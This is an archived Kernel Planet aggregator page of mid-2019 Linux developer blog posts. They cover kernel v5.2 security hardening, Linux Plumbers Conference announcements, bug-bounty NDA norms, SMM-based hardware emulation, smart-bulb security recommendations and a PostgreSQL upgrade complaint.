Kernel Planet

July 18, 2019

Kees Cook: security things in Linux v5.2

Previously: v5.1.

Linux kernel v5.2 was released last week! Here are some security-related things I found interesting:

page allocator freelist randomization
While the SLUB and SLAB allocator freelists have been randomized for a while now, the overarching page allocator itself wasn’t. This meant that anything doing allocation outside of the kmem_cache/kmalloc() would have deterministic placement in memory. This is bad both for security and for some cache management cases. Dan Williams implemented this randomization under CONFIG_SHUFFLE_PAGE_ALLOCATOR now, which provides additional uncertainty to memory layouts, though at a rather low granularity of 4MB (see SHUFFLE_ORDER). Also note that this feature needs to be enabled at boot time with page_alloc.shuffle=1 unless you have direct-mapped memory-side-cache (you can check the state at /sys/module/page_alloc/parameters/shuffle).

stack variable initialization with Clang
Alexander Potapenko added support via CONFIG_INIT_STACK_ALL for Clang’s -ftrivial-auto-var-init=pattern option that enables automatic initialization of stack variables. This provides even greater coverage than the prior GCC plugin for stack variable initialization, as Clang’s implementation also covers variables not passed by reference. (In theory, the kernel build should still warn about these instances, but even if they exist, Clang will initialize them.) Another notable difference between the GCC plugins and Clang’s implementation is that Clang initializes with a repeating 0xAA byte pattern, rather than zero. (Though this changes under certain situations, like for 32-bit pointers which are initialized with 0x000000AA.) As with the GCC plugin, the benefit is that the entire class of uninitialized stack variable flaws goes away.

Kernel Userspace Access Prevention on powerpc
Like SMAP on x86 and PAN on ARM, Michael Ellerman and Russell Currey have landed support for disallowing access to userspace without explicit markings in the kernel (KUAP) on Power9 and later PPC CPUs under CONFIG_PPC_RADIX_MMU=y (which is the default). This is the continuation of the execute protection (KUEP) in v4.10. Now if an attacker tries to trick the kernel into any kind of unexpected access from userspace (not just executing code), the kernel will fault.

Microarchitectural Data Sampling mitigations on x86
Another set of cache memory side-channel attacks came to light, and were consolidated together under the name Microarchitectural Data Sampling (MDS). MDS is weaker than other cache side-channels (less control over target address), but memory contents can still be exposed. Much like L1TF, when one’s threat model includes untrusted code running under Symmetric Multi Threading (SMT: more logical cores than physical cores), the only full mitigation is to disable hyperthreading (boot with “nosmt“). For all the other variations of the MDS family, Andi Kleen (and others) implemented various flushing mechanisms to avoid cache leakage.

unprivileged userfaultfd sysctl knob
Both FUSE and userfaultfd provide attackers with a way to stall a kernel thread in the middle of memory accesses from userspace by initiating an access on an unmapped page. While FUSE is usually behind some kind of access controls, userfaultfd hadn’t been. To avoid things like Use-After-Free heap grooming, Peter Xu added the new “vm.unprivileged_userfaultfd” sysctl knob to disallow unprivileged access to the userfaultfd syscall.

temporary mm for text poking on x86
The kernel regularly performs self-modification with things like text_poke() (during stuff like alternatives, ftrace, etc). Before, this was done with fixed mappings (“fixmap”) where a specific fixed address at the high end of memory was used to map physical pages as needed. However, this resulted in some temporal risks: other CPUs could write to the fixmap, or there might be stale TLB entries on removal that other CPUs might still be able to write through to change the target contents. Instead, Nadav Amit has created a separate memory map for kernel text writes, as if the kernel is trying to make writes to userspace. This mapping ends up staying local to the current CPU, and the poking address is randomized, unlike the old fixmap.

ongoing: implicit fall-through removal
Gustavo A. R. Silva is nearly done with marking (and fixing) all the implicit fall-through cases in the kernel. Based on the pull request from Gustavo, it looks very much like v5.3 will see -Wimplicit-fallthrough added to the global build flags and then this class of bug should stay extinct in the kernel.

That’s it for now; let me know if you think I should add anything here. We’re almost to -rc1 for v5.3!

© 2019, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
Creative Commons License

July 18, 2019 12:07 AM

July 17, 2019

Linux Plumbers Conference: System Boot and Security Microconference Accepted into 2019 Linux Plumbers Conference

We are pleased to announce that the System Boot and Security Microconference has been accepted into the 2019 Linux Plumbers Conference! Computer-system security is a topic that has gotten a lot of serious attention over the years, but there has not been anywhere near as much attention paid to the system firmware. But the firmware is also a target for those looking to wreak havoc on our systems. Firmware is now being developed with security in mind, but provides incomplete solutions. This microconference will focus on the security of the system especially from the time the system is powered on.

Expected topics for this year include:

Come and join us in the discussion of keeping your system secure even at boot up.

We hope to see you there!

July 17, 2019 04:57 PM

July 10, 2019

Linux Plumbers Conference: Power Management and Thermal Control Microconference Accepted into 2019 Linux Plumbers Conference

We are pleased to announce that the Power Management and Thermal Control Microconference has been accepted into the 2019 Linux Plumbers Conference! Power management and thermal control are important areas in the Linux ecosystem to help improve the environment of the planet. In recent years, computer systems have been becoming more and more complex and thermally challenged at the same time and the energy efficiency expectations regarding them have been growing. This trend is likely to continue in the foreseeable future and despite the progress made in the power-management and thermal-control problem space since the Linux Plumbers Conference last year. That progress includes, but is not limited to, the merging of the energy-aware scheduling patch series and CPU idle-time management improvements; there will be more work to do in those areas. This gathering will focus on continuing to have Linux meet the power-management and thermal-control challenge.

Topics for this year include:

Come and join us in the discussion of how to extend the battery life of your laptop while keeping it cool.

We hope to see you there!

July 10, 2019 10:29 PM

July 09, 2019

Linux Plumbers Conference: Android Microconference Accepted into 2019 Linux Plumbers Conference

We are pleased to announce that the Android Microconference has been accepted into the 2019 Linux Plumbers Conference! Android has a long history at Linux Plumbers and has continually made progress as a direct result of these meetings. This year’s focus will be a fairly ambitious goal to create a Generic Kernel Image (GKI) (or one kernel to rule them all!). Having a GKI will allow silicon vendors to be independent of the Linux kernel running on the device. As such, kernels could be easily upgraded without requiring any rework of the initial hardware porting efforts. This microconference will also address areas that have been discussed in the past.

The proposed topics include:

Come and join us in the discussion of improving what is arguably the most popular operating system in the world!

We hope to see you there!

July 09, 2019 11:29 PM

Matthew Garrett: Bug bounties and NDAs are an option, not the standard

Zoom had a vulnerability that allowed users on MacOS to be connected to a video conference with their webcam active simply by visiting an appropriately crafted page. Zoom's response has largely been to argue that:

a) There's a setting you can toggle to disable the webcam being on by default, so this isn't a big deal,
b) When Safari added a security feature requiring that users explicitly agree to launch Zoom, this created a poor user experience and so they were justified in working around this (and so introducing the vulnerability), and,
c) The submitter asked whether Zoom would pay them for disclosing the bug, and when Zoom said they'd only do so if the submitter signed an NDA, they declined.

(a) and (b) are clearly ludicrous arguments, but (c) is the interesting one. Zoom go on to mention that they disagreed with the severity of the issue, and in the end decided not to change how their software worked. If the submitter had agreed to the terms of the NDA, then Zoom's decision that this was a low severity issue would have led to them being given a small amount of money and never being allowed to talk about the vulnerability. Since Zoom apparently have no intention of fixing it, we'd presumably never have heard about it. Users would have been less informed, and the world would have been a less secure place.

The point of bug bounties is to provide people with an additional incentive to disclose security issues to companies. But what incentive are they offering? Well, that depends on who you are. For many people, the amount of money offered by bug bounty programs is meaningful, and agreeing to sign an NDA is worth it. For others, the ability to publicly talk about the issue is worth more than whatever the bounty may award - being able to give a presentation on the vulnerability at a high profile conference may be enough to get you a significantly better paying job. Others may be unwilling to sign an NDA on principle, refusing to trust that the company will ever disclose the issue or fix the vulnerability. And finally there are people who can't sign such an NDA - they may have discovered the issue on work time, and employer policies may prohibit them doing so.

Zoom are correct that it's not unusual for bug bounty programs to require NDAs. But when they talk about this being an industry standard, they come awfully close to suggesting that the submitter did something unusual or unreasonable in rejecting their bounty terms. When someone lets you know about a vulnerability, they're giving you an opportunity to have the issue fixed before the public knows about it. They've done something they didn't need to do - they could have just publicly disclosed it immediately, causing significant damage to your reputation and potentially putting your customers at risk. They could potentially have sold the information to a third party. But they didn't - they came to you first. If you want to offer them money in order to encourage them (and others) to do the same in future, then that's great. If you want to tie strings to that money, that's a choice you can make - but there's no reason for them to agree to those strings, and if they choose not to then you don't get to complain about that afterwards. And if they make it clear at the time of submission that they intend to publicly disclose the issue after 90 days, then they're acting in accordance with widely accepted norms. If you're not able to fix an issue within 90 days, that's very much your problem.

If your bug bounty requires people sign an NDA, you should think about why. If it's so you can control disclosure and delay things beyond 90 days (and potentially never disclose at all), look at whether the amount of money you're offering for that is anywhere near commensurate with the value the submitter could otherwise gain from the information and compare that to the reputational damage you'll take from people deciding that it's not worth it and just disclosing unilaterally. And, seriously, never ask for an NDA before you're committing to a specific $ amount - it's never reasonable to ask that someone sign away their rights without knowing exactly what they're getting in return.

tl;dr - a bug bounty should only be one component of your vulnerability reporting process. You need to be prepared for people to decline any restrictions you wish to place on them, and you need to be prepared for them to disclose on the date they initially proposed. If they give you 90 days, that's entirely within industry norms. Remember that a bargain is being struck here - you offering money isn't being generous, it's you attempting to provide an incentive for people to help you improve your security. If you're asking people to give up more than you're offering in return, don't be surprised if they say no.

comment count unavailable comments

July 09, 2019 09:15 PM

Linux Plumbers Conference: Update on LPC 2019 registration waiting list

Here is an update regarding the registration situation for LPC2019.

The considerable interest for participation this year meant that the conference sold out earlier than ever before.

Instead of a small release of late-registration spots, the LPC planning committee has decided to run a waiting list, which will be used as the exclusive method for additional registrations. The planning committee will reach out to individuals on the waiting list and inviting them to register at the regular rate of $550, as spots become available.

With the majority of the Call for Proposals (CfP) still open, it is not yet possible to release passes. The planning committee and microconferences leads are working together to allocate the passes earmarked for microconferences. The Networking Summit and Kernel Summit speakers are yet to be confirmed also.

The planning committee understands that many of those who added themselves to the waiting list wish to find out soon whether they will be issued a pass. We anticipate the first passes to be released on July 22nd at the earliest.

Please follow us on social media, or here on this blog for further updates.

July 09, 2019 01:36 AM

July 08, 2019

Linux Plumbers Conference: VFIO/IOMMU/PCI Microconference Accepted into 2019 Linux Plumbers Conference

We are pleased to announce that the VFIO/IOMMU/PCI Microconference has been accepted into the 2019 Linux Plumbers Conference!

The PCI interconnect specification and the devices implementing it are incorporating more and more features aimed at high performance systems. This requires the kernel to coordinate the PCI devices, the IOMMUs they are connected to and the VFIO layer used to manage them (for user space access and device pass-through) so that users (and virtual machines) can use them effectively. The kernel interfaces to control PCI devices have to be designed in-sync for all three subsystems, which implies that there are lots of intersections in the design of kernel control paths for VFIO/IOMMU/PCI requiring kernel code design discussions involving the three subsystems at once.

A successful VFIO/IOMMU/PCI Microconference was held at Linux Plumbers in 2017, where:

This year, the microconference will follow up on the previous microconference agendas and focus on ongoing patches review/design aimed at VFIO/IOMMU/PCI subsystems.

Topics for this year include:

Come and join us in the discussion in helping Linux keep up with the new features being added to the PCI interconnect specification.

We hope to see you there!

July 08, 2019 05:56 PM

July 07, 2019

Matthew Garrett: Creating hardware where no hardware exists

The laptop industry was still in its infancy back in 1990, but it still faced a core problem that we do today - power and thermal management are hard, but also critical to a good user experience (and potentially to the lifespan of the hardware). This is in the days where DOS and Windows had no memory protection, so handling these problems at the OS level would have been an invitation for someone to overwrite your management code and potentially kill your laptop. The safe option was pushing all of this out to an external management controller of some sort, but vendors in the 90s were the same as vendors now and would do basically anything to avoid having to drop an extra chip on the board. Thankfully(?), Intel had a solution.

The 386SL was released in October 1990 as a low-powered mobile-optimised version of the 386. Critically, it included a feature that let vendors ensure that their power management code could run without OS interference. A small window of RAM was hidden behind the VGA memory[1] and the CPU configured so that various events would cause the CPU to stop executing the OS and jump to this protected region. It could then do whatever power or thermal management tasks were necessary and return control to the OS, which would be none the wiser. Intel called this System Management Mode, and we've never really recovered.

Step forward to the late 90s. USB is now a thing, but even the operating systems that support USB usually don't in their installers (and plenty of operating systems still didn't have USB drivers). The industry needed a transition path, and System Management Mode was there for them. By configuring the chipset to generate a System Management Interrupt (or SMI) whenever the OS tried to access the PS/2 keyboard controller, the CPU could then trap into some SMM code that knew how to talk to USB, figure out what was going on with the USB keyboard, fake up the results and pass them back to the OS. As far as the OS was concerned, it was talking to a normal keyboard controller - but in reality, the "hardware" it was talking to was entirely implemented in software on the CPU.

Since then we've seen even more stuff get crammed into SMM, which is annoying because in general it's much harder for an OS to do interesting things with hardware if the CPU occasionally stops in order to run invisible code to touch hardware resources you were planning on using, and that's even ignoring the fact that operating systems in general don't really appreciate the entire world stopping and then restarting some time later without any notification. So, overall, SMM is a pain for OS vendors.

Change of topic. When Apple moved to x86 CPUs in the mid 2000s, they faced a problem. Their hardware was basically now just a PC, and that meant people were going to try to run their OS on random PC hardware. For various reasons this was unappealing, and so Apple took advantage of the one significant difference between their platforms and generic PCs. x86 Macs have a component called the System Management Controller that (ironically) seems to do a bunch of the stuff that the 386SL was designed to do on the CPU. It runs the fans, it reports hardware information, it controls the keyboard backlight, it does all kinds of things. So Apple embedded a string in the SMC, and the OS tries to read it on boot. If it fails, so does boot[2]. Qemu has a driver that emulates enough of the SMC that you can provide that string on the command line and boot OS X in qemu, something that's documented further here.

What does this have to do with SMM? It turns out that you can configure x86 chipsets to trap into SMM on arbitrary IO port ranges, and older Macs had SMCs in IO port space[3]. After some fighting with Intel documentation[4] I had Coreboot's SMI handler responding to writes to an arbitrary IO port range. With some more fighting I was able to fake up responses to reads as well. And then I took qemu's SMC emulation driver and merged it into Coreboot's SMM code. Now, accesses to the IO port range that the SMC occupies on real hardware generate SMIs, trap into SMM on the CPU, run the emulation code, handle writes, fake up responses to reads and return control to the OS. From the OS's perspective, this is entirely invisible[5]. We've created hardware where none existed.

The tree where I'm working on this is here, and I'll see if it's possible to clean this up in a reasonable way to get it merged into mainline Coreboot. Note that this only handles the SMC - actually booting OS X involves a lot more, but that's something for another time.

[1] If the OS attempts to access this range, the chipset directs it to the video card instead of to actual RAM.
[2] It's actually more complicated than that - see here for more.
[3] IO port space is a weird x86 feature where there's an entire separate IO bus that isn't part of the memory map and which requires different instructions to access. It's low performance but also extremely simple, so hardware that has no performance requirements is often implemented using it.
[4] Some current Intel hardware has two sets of registers defined for setting up which IO ports should trap into SMM. I can't find anything that documents what the relationship between them is, but if you program the obvious ones nothing happens and if you program the ones that are hidden in the section about LPC decoding ranges things suddenly start working.
[5] Eh technically a sufficiently enthusiastic OS could notice that the time it took for the access to occur didn't match what it should on real hardware, or could look at the CPU's count of the number of SMIs that have occurred and correlate that with accesses, but good enough

comment count unavailable comments

July 07, 2019 08:15 PM

Linux Plumbers Conference: Scheduler Microconference Accepted into 2019 Linux Plumbers Conference

We are pleased to announce that the Scheduler Microconference has been accepted into the 2019 Linux Plumbers Conference! The scheduler determines what runs on the CPU at any given time. The lag of your desktop is affected by the scheduler, for example. There are a few different scheduling classes for a user to choose from, such as the default class (SCHED_OTHER) or a real-time class (SCHED_FIFO, SCHED_RT and SCHED_DEADLINE). The deadline scheduler is the newest and allows the user to control the amount of bandwidth received by a task or group of tasks. With cloud computing becoming popular these days, controlling bandwidth of containers or virtual machines is becoming more important. The Real-Time patch is also destined to become mainline, which will add more strain on the scheduling of tasks to make sure that real-time tasks make their deadlines (although, this Microconference will focus on non real-time aspects of the scheduler. Please defer real-time topics to the Real-time Microconference). This requires verification techniques to ensure the scheduler is properly designed.

Topics for this year include:

Come and join us in the discussion of controlling what tasks get to run on your machine and when.

We hope to see you there!

July 07, 2019 02:51 PM

July 03, 2019

Linux Plumbers Conference: RDMA Microconference Accepted into 2019 Linux Plumbers Conference

We are pleased to announce that the RDMA Microconference has been accepted into the 2019 Linux Plumbers Conference! RDMA has been a microconference at Plumbers for the last three years and will be continuing its productive work for a fourth year. The RDMA meetings at the previous Plumbers have been critical in getting improvements to the RDMA subsystem merged into mainline. These include a new user API, container support, testability/syzkaller, system bootup, Soft iWarp, and more. There are still difficult open issues that need to be resolved, and this year’s Plumbers RDMA Microconfernence is sure to come up with answers to these tough problems.

Topics for this year include:

And new developing areas of interest:

Come and join us in the discussion of improving Linux’s ability to access direct memory across high-speed networks.

We hope to see you there!

July 03, 2019 10:54 PM

July 02, 2019

Linux Plumbers Conference: Announcing the LPC 2019 registration waiting list

 

The current pool of registrations for the 2019 Linux Plumbers Conference has sold out.

Those not yet registered who wish to attend should fill out the form here to get on the waiting list.

As registration spots open up, the Plumbers organizing committee will allocate them to those  on the waiting list with priority given to those who will be participating in microconferences and BoFs.

 

 

July 02, 2019 07:22 PM

Linux Plumbers Conference: Preliminary schedule for LPC 2019 has been published

The LPC committee is pleased to announce the preliminary schedule for the 2019 Linux Plumbers Conference.

The vast majority of the LPC refereed track talks have been accepted and are listed there. The same is true for microconferences. While there are a few talks and microconferences to be announced, you will find the current overview LPC schedule here. The LPC refereed track talks can be seen here.

The call for proposals (CfP) is still open for the Kernel Summit, Networking Summit, BOFs and topics for accepted microconferences.

As new microconferences, talks, and BOFs are accepted, they will be published to the schedule.

July 02, 2019 04:48 PM

June 30, 2019

Matthew Garrett: Which smart bulbs should you buy (from a security perspective)

People keep asking me which smart bulbs they should buy. It's a great question! As someone who has, for some reason, ended up spending a bunch of time reverse engineering various types of lightbulb, I'm probably a reasonable person to ask. So. There are four primary communications mechanisms for bulbs: wifi, bluetooth, zigbee and zwave. There's basically zero compelling reasons to care about zwave, so I'm not going to.

Wifi


Advantages: Doesn't need an additional hub - you can just put the bulbs wherever. The bulbs can connect out to a cloud service, so you can control them even if you're not on the same network.
Disadvantages: Only works if you have wifi coverage, each bulb has to have wifi hardware and be configured appropriately.
Which should you get: If you search Amazon for "wifi bulb" you'll get a whole bunch of cheap bulbs. Don't buy any of them. They're mostly based on a custom protocol from Zengge and they're shit. Colour reproduction is bad, there's no good way to use the colour LEDs and the white LEDs simultaneously, and if you use any of the vendor apps they'll proxy your device control through a remote server with terrible authentication mechanisms. Just don't. The ones that aren't Zengge are generally based on the Tuya platform, whose security model is to have keys embedded in some incredibly obfuscated code and hope that nobody can find them. TP-Link make some reasonably competent bulbs but also use a weird custom protocol with hand-rolled security. Eufy are fine but again there's weird custom security. Lifx are the best bulbs, but have zero security on the local network - anyone on your wifi can control the bulbs. If that's something you care about then they're a bad choice, but also if that's something you care about maybe just don't let people you don't trust use your wifi.
Conclusion: If you have to use wifi, go with lifx. Their security is not meaningfully worse than anything else on the market (and they're better than many), and they're better bulbs. But you probably shouldn't go with wifi.

Bluetooth


Advantages: Doesn't need an additional hub. Doesn't need wifi coverage. Doesn't connect to the internet, so remote attack is unlikely.
Disadvantages: Only one control device at a time can connect to a bulb, so harder to share. Control device needs to be in Bluetooth range of the bulb. Doesn't connect to the internet, so you can't control your bulbs remotely.
Which should you get: Again, most Bluetooth bulbs you'll find on Amazon are shit. There's a whole bunch of weird custom protocols and the quality of the bulbs is just bad. If you're going to go with anything, go with the C by GE bulbs. Their protocol is still some AES-encrypted custom binary thing, but they use a Bluetooth controller from Telink that supports a mesh network protocol. This means that you can talk to any bulb in your network and still send commands to other bulbs - the dual advantages here are that you can communicate with bulbs that are outside the range of your control device and also that you can have as many control devices as you have bulbs. If you've bought into the Google Home ecosystem, you can associate them directly with a Home and use Google Assistant to control them remotely. GE also sell a wifi bridge - I have one, but haven't had time to review it yet, so make no assertions around its competence. The colour bulbs are also disappointing, with much dimmer colour output than white output.

Zigbee


Advantages: Zigbee is a mesh protocol, so bulbs can forward messages to each other. The bulbs are also pretty cheap. Zigbee is a standard, so you can obtain bulbs from several vendors that will then interoperate - unfortunately there are actually two separate standards for Zigbee bulbs, and you'll sometimes find yourself with incompatibility issues there.
Disadvantages: Your phone doesn't have a Zigbee radio, so you can't communicate with the bulbs directly. You'll need a hub of some sort to bridge between IP and Zigbee. The ecosystem is kind of a mess, and you may have weird incompatibilities.
Which should you get: Pretty much every vendor that produces Zigbee bulbs also produces a hub for them. Don't get the Sengled hub - anyone on the local network can perform arbitrary unauthenticated command execution on it. I've previously recommended the Ikea Tradfri, which at the time only had local control. They've since added remote control support, and I haven't investigated that in detail. But overall, I'd go with the Philips Hue. Their colour bulbs are simply the best on the market, and their security story seems solid - performing a factory reset on the hub generates a new keypair, and adding local control users requires a physical button press on the hub to allow pairing. Using the Philips hub doesn't tie you into only using Philips bulbs, but right now the Philips bulbs tend to be as cheap (or cheaper) than anything else.

But what about


If you're into tying together all kinds of home automation stuff, then either go with Smartthings or roll your own with Home Assistant. Both are definitely more effort if you only want lighting.

My priority is software freedom


Excellent! There are various bulbs that can run the Espurna or AiLight firmwares, but you'll have to deal with flashing them yourself. You can tie that into Home Assistant and have a completely free stack. If you're ok with your bulbs being proprietary, Home Assistant can speak to most types of bulb without an additional hub (you'll need a supported Zigbee USB stick to control Zigbee bulbs), and will support the C by GE ones as soon as I figure out why my Bluetooth transmissions stop working every so often.

Conclusion


Outside niche cases, just buy a Hue. Philips have done a genuinely good job. Don't buy cheap wifi bulbs. Don't buy a Sengled hub.

(Disclaimer: I mentioned a Google product above. I am a Google employee, but do not work on anything related to Home.)

comment count unavailable comments

June 30, 2019 08:10 PM

June 26, 2019

Linux Plumbers Conference: Databases Microconference Accepted into 2019 Linux Plumbers Conference

We are pleased to announce that the Databases Microconference has been accepted into the 2019 Linux Plumbers Conference! Linux plumbing is heavily important to those who implement databases and their users who expect fast and durable data handling.

Durability is a promise never to lose data after advising a user of a successful update, even in the face of power loss. It requires a full-stack solution from the application to the database, then to Linux (filesystem, VFS, block interface, driver), and on to the hardware.

Fast means getting a database user a response in less that tens of milliseconds, which requires that Linux filesystems, memory and CPU management, and the networking stack do everything with the utmost effectiveness and efficiency.

For all Linux users, there is a benefit in having database developers interact with system developers; it will ensure that the promise of durability and speed are both kept as newer hardware technologies emerge, existing CPU/RAM resources grow, and while data stored grows even faster.

Topics for this Microconference include:

Come and join us in the discussion about making databases run smoother and faster.

We hope to see you there!

June 26, 2019 03:14 PM

June 25, 2019

James Morris: Linux Security Summit North America 2019: Schedule Published

The schedule for the 2019 Linux Security Summit North America (LSS-NA) is published.

This year, there are some changes to the format of LSS-NA. The summit runs for three days instead of two, which allows us to relax the schedule somewhat while also adding new session types.  In addition to refereed talks, short topics, BoF sessions, and subsystem updates, there are now also tutorials (one each day), unconference sessions, and lightning talks.

The tutorial sessions are:

These tutorials will be 90 minutes in length, and they’ll run in parallel with unconference sessions on the first two days (when the space is available at the venue).

The refereed presentations and short topics cover a range of Linux security topics including platform boot security, integrity, container security, kernel self protection, fuzzing, and eBPF+LSM.

Some of the talks I’m personally excited about include:

The schedule last year was pretty crammed, so with the addition of the third day we’ve been able to avoid starting early, and we’ve also added five minute transitions between talks. We’re hoping to maximize collaboration via the more relaxed schedule and the addition of more types of sessions (unconference, tutorials, lightning talks).  This is not a conference for simply consuming talks, but to also participate and to get things done (or started).

Thank you to all who submitted proposals.  As usual, we had many more submissions than can be accommodated in the available time.

Also thanks to the program committee, who spent considerable time reviewing and discussing proposals, and working out the details of the schedule. The committee for 2019 is:

  • James Morris (Microsoft)
  • Serge Hallyn (Cisco)
  • Paul Moore (Cisco)
  • Stephen Smalley (NSA)
  • Elena Reshetova (Intel)
  • John Johnansen (Canonical)
  • Kees Cook (Google)
  • Casey Schaufler (Intel)
  • Mimi Zohar (IBM)
  • David A. Wheeler (Institute for Defense Analyses)

And of course many thanks to the event folk at Linux Foundation, who handle all of the logistics of the event.

LSS-NA will be held in San Diego, CA on August 19-21. To register, click here. Or you can register for the co-located Open Source Summit and add LSS-NA.

 

June 25, 2019 08:43 PM

June 19, 2019

Linux Plumbers Conference: Real-Time Microconference Accepted into 2019 Linux Plumbers Conference

We are pleased to announce that the Real-Time Microconference has been accepted into the 2019 Linux Plumbers Conference! The PREEMPT_RT patch set (aka “The Real-Time Patch”) was created in 2004 in the effort to make Linux into a hard real-time designed operating system. Over the years much of the RT patch has made it into mainline Linux, which includes: mutexes, lockdep, high-resolution timers, Ftrace, RCU_PREEMPT, priority inheritance, threaded interrupts and much more. There’s just a little left to get RT fully into mainline, and the light at the end of the tunnel is finally in view. It is expected that the RT patch will be in mainline within a year, which changes the topics of discussion. Once it is in Linus’s tree, a whole new set of issues must be handled. The focus on this year’s Plumbers events will include:

Come and join us in the discussion of making the LWN prediction of RT coming into mainline “this year” a reality!

We hope to see you there!

June 19, 2019 10:55 PM

Linux Plumbers Conference: Testing and Fuzzing Microconference Accepted into 2019 Linux Plumbers Conference

We are pleased to announce that the Testing and Fuzzing Microconference has been accepted into the 2019 Linux Plumbers Conference! Testing and fuzzing are crucial to the stability that the Linux kernel demands.

Last year’s microconference brought about a number of discussions; for example, syzkaller evolved as syzbot, which keeps track of fuzzing efforts and the resulting fixes. The closing ceremony pointed out all the work that still has to be done: There are a number of overlapping efforts, and those need to be consolidated. The use of KASAN should be increased. Where is fuzzing going next? With real-time moving forward from “if” to “when” in the mainline, how does RT test coverage increase? The unit-testing frameworks may need some unification. Also, KernelCI will be announced as an LF project this time around. Stay around for the KernelCI hackathon after the conference to help further those efforts.

Come and join us for the discussion!

We hope to see you there!

June 19, 2019 02:29 AM

June 17, 2019

Linux Plumbers Conference: Toolchains Microconference Accepted into 2019 Linux Plumbers Conference

We are pleased to announce that the Toolchains Microconference has been accepted into the 2019 Linux Plumbers Conference! The Linux kernel may
be one of the most powerful systems around, but it takes a powerful toolchain to make that happen. The kernel takes advantage of any feature
that the toolchains provide, and collaboration between the kernel and toolchain developers will make that much more seamless.

Toolchains topics will include:

Come and join us in the discussion of what makes it possible to build the most robust and flexible kernel in the world!

We hope to see you there!

June 17, 2019 06:10 PM

June 15, 2019

Greg Kroah-Hartman: Linux stable tree mirror at github

As everyone seems to like to put kernel trees up on github for random projects (based on the crazy notifications I get all the time), I figured it was time to put up a semi-official mirror of all of the stable kernel releases on github.com

It can be found at: https://github.com/gregkh/linux and I will try to keep it up to date with the real source of all kernel stable releases at https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/

It differs from Linus’s tree at: https://github.com/torvalds/linux in that it contains all of the different stable tree branches and stable releases and tags, which many devices end up building on top of.

So, mirror away!

Also note, this is a read-only mirror, any pull requests created on it will be gleefully ignored, just like happens on Linus’s github mirror.

If people think this is needed on any other git hosting site, just let me know and I will be glad to push to other places as well.

This notification was also cross-posted on the new http://people.kernel.org/ site, go follow that for more kernel developer stuff.

June 15, 2019 08:10 PM

June 14, 2019

Linux Plumbers Conference: Open Printing Microconference Accepted into 2019 Linux Plumbers Conference

We are pleased to announce that the Open Printing Microconference has been accepted into the 2019 Linux Plumbers Conference! In today’s world much is done online. But getting a hardcopy is still very much needed, even today. Then there’s the case of having a hardcopy and wanting to scan it to make it digital. All of this is needed to be functional on Linux to keep Linux-based and open source operating systems relevant. Also, with the progress in technology, the usage of modern printers and scanners is becoming simple. The driverless concept has made printing and scanning easier and gets the job done with some simple clicks without requiring the user to install any kind of driver software. The Open Printing organization has been tasked with getting this job done. This Microconference will focus on what needs to be accomplished to keep Linux and open source operating systems a leader in today’s market.

Topics for this Microconference include:

Come and join us in the discussion of keeping your printers working.

We hope to see you there!

June 14, 2019 03:18 PM

June 13, 2019

Linux Plumbers Conference: Live Patching Microconference Accepted into 2019 Linux Plumbers Conference

We are pleased to announce that the Live Patching Microconference has been accepted into the 2019 Linux Plumbers Conference! There are some workloads that require 100% uptime so rebooting for maintenance is not an option. But this can make the system insecure as new security vulnerabilities may have been discovered in the running kernel. Live kernel patching is a technique to update the kernel without taking down the machine. As one can imagine, patching a running kernel is far from trivial. Although it is being used in production today[1][2], there are still many issues that need to be solved.

These include:

Come and join us in the discussion about changing your running kernel without having to take it down!

We hope to see you there!

June 13, 2019 08:19 PM

June 12, 2019

Linux Plumbers Conference: You, Me and IoT Microconference Accepted into 2019 Linux Plumbers Conference

We are pleased to announce that the You, Me and IoT Microconference has been accepted into the 2019 Linux Plumbers Conference! IoT is becoming an
integral part of our daily lives, controlling such devices as on/off switches, temperature controls, door and window sensors and so much more. But the technology itself requires a lot of infrastructure and communication frameworks such as Zigbee, OpenHAB and 6LoWPAN. Open source Real-Time embedded operating systems also come into play like Zephyr. A completely open source framework implementation is Greybus that already made it into staging. Discussions will be around Greybus:

– Device management
– Abstracted devices
– Management of Unique IDs
– Network management
– Userspace utilities
– Network Authentication
– Encryption
– Firmware updates
– And more

Come join us and participate in the discussion on what keeps the Internet of Things together.

We hope to see you there!

June 12, 2019 02:00 PM

June 07, 2019

Pete Zaitcev: PostgreSQL and upgrades

As mentioned previously, I run a personal Fediverse instance with Pleroma, which uses Postgres. On Fedora, of course. So, a week ago, I went to do the usual "dnf distro-sync --releasever=30". And then, Postgres fails to start, because the database uses the previous format, 10, and the packages in F30 require format 11. Apparently, I was supposed to dump the database with pg_dumpall, upgrade, then restore. But now that I have binaries that refuse to read the old format, dumping is impossible. Wow.

A little web searching found an upgrader that works across formats (dnf install postgresql-upgrade; postgresql-setup --upgrade). But that one also copies the database, like a dump-restore procedure would. What if the database is too large for this? Am I the only one who finds these practices unacceptable?

Postgres was supposed to be a solid big brother to a boisterous but unreliable upstart MySQL, kind of like Postfix and Exim. But this is just such an absurd fault, it makes me think that I'm missing something essential.

UPDATE: Kaz commented that a form of -compat is conventional:

When I've upgraded in the past, Ubuntu has always just installed the new version of postgres alongside the old one, to allow me to manually export and reimport at my leisure, then remove the old version afterward. Because both are installed, you could pipe the output of one dumpall to the psql command on the other database and the size doesn't matter. The apps continue to point at their old version until I redirect them.

Yeah, as much as I can tell, Fedora does not package anything like that.

June 07, 2019 02:04 PM

June 04, 2019

Linux Plumbers Conference: Containers and Checkpoint/Restore MC Accepted into 2019 Linux Plumbers Conference

We are pleased to announce that the Containers and Checkpoint/Restore Microconference has been accepted into the 2019 Linux Plumbers Conference! Even after the success of last year’s Containers Microconference, there’s still more to work on this year.

Last year had a security focus that featured seccomp support and LSM namespacing and stacking, but now the need to look at the next steps and sets of blockers for those needs to be discussed.

Since last year’s Linux Plumbers in Vancouver, binderfs has been accepted into mainline, but more work is needed in order to fully support Android containers.

Another improvement since Vancouver is that shiftfs is now functional and included in Ubuntu, however, more work is required (including changes to VFS) before shiftfs can be accepted into mainline.

CGroup V2 is an ongoing task needing more work, with one topic of particular interest being feature parity with V1.

Additional important discussion topics include:

Come join us and participate in the discussion on what holds “The Cloud” together.

June 04, 2019 02:05 PM

June 03, 2019

Pete Zaitcev: Pi-hole

With the recent move by Google to disable the ad-blockers in Chrome (except for Enterprise level customers[1]), the interest is sure to increase for methods of protection against the ad-delivered malware, other than browser plug-ins. I'm sure Barracuda will make some coin if it's still around. And on the free software side, someone is making an all-in-one package for Raspberry Pi, called "Pi-hole". It works by screwing with DNS, which is actually an impressive demonstration of what an attack on DNS can do.

